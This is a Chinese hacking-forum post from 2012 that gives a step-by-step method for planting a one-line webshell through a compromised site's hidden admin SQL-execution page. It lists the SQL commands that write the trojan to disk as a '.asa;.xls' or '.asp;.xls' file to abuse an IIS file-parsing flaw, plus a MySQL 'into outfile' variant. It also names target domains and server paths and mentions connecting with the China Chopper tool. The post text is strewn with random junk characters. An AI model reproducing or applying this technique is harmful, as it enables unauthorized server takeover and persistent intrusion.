找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2028|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。
1 q, x) u" W9 L  G8 K6 Zwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
2 X' k0 l0 w/ e5 }$ J! t文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
& o# M. l( X9 @! Y& T然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:& {, ?0 L5 i1 [  x+ s
1.create table cmd (a varchar(50))
2 X! H8 y/ A" k; m2 _2.insert into cmd (a) values (‘‘)
2 E! f, P  x; ^. s. D6 k3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
9 ^) Q! W# u/ T: y! j, o* V% R(把表cmd的内容导出为物理路径的一个EXCEL文件)0 S: g! @  E2 {" e* @  M5 O! [
4.drop table cmd! Q$ d) Y1 _! c- ?
利用IIS的BUG成功拿到了WEBSHELL。. S0 ]- I: _' M* @8 r2 W
0 U% i% u5 [4 P" O9 X9 j* y
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话  |: K% Q/ E* l/ m
1 G3 J% w+ Q  y6 [1 p8 W
  SQL语句意思解释:6 `4 A% ~% y  H+ H3 U; |$ w
  第一句3 o( _1 r+ ^2 @
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
0 k: y* L* @% e9 [( @: y4 L- ^) A  A# ~$ \+ s/ g- ^8 h
  第二句
. Y' [5 Z6 \  m0 U/ d5 C  在表cmd的a字段插入一句话木马% y; m" R2 x' P' s4 w
  第三句; R6 b/ v( C+ q, ^$ D. j2 r* s# p
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
/ U9 a& `- C1 E$ N. U5 _) `( }7 n+ U1 l( \+ l5 I5 Y
  第四句0 T1 _: C/ a0 e
  删除建立的cmd表& w- z5 b- j, \9 ~

* d' s$ ^/ X( g* o7 w  以下内容为测试:. }* l* [+ H6 }& \
  Access利用后台SQL执行命令功能导出WebShell:
/ S& s1 b( m* X  这个更简单:& X4 f' t8 L/ i4 P% x" Q* G& D, s
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]1 @. O) `, @" i8 R; _3 b
  或者
" Y  z6 L1 [  B) w( _! U+ L  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
* Z$ ~3 z" N' O9 O& D
! L- K6 c- O( _: C" k  J9 Y  后台有执行SQL语句功能(vote为已知表段)4 k; F, _2 n" s; l3 }& l
  希望对大家有所帮助拿shell的又一个思路: Z8 I: e' n  }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表